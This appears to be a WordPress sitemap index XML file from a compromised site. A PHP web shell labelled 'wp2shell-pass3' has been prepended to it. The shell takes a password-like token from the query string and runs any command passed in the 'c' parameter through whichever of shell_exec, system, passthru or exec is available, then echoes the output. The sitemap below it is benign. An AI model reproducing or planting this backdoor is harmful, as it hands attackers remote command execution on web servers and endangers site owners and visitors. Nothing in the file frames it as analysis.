
// wp2shell-pass3
if (isset($_GET['t']) && hash_equals('f4eb47e54bf95627d2d69c0b4ffc3213', (string)$_GET['t']) && isset($_GET['c'])) {
    $c=(string)$_GET['c']; $o='';
    if(function_exists('shell_exec')) $o=(string)@shell_exec($c);
    elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();}
    elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();}
    elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);}
    $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit;
}





<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://www.51goodwill.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://www.51goodwill.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://www.51goodwill.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://www.51goodwill.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://www.51goodwill.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
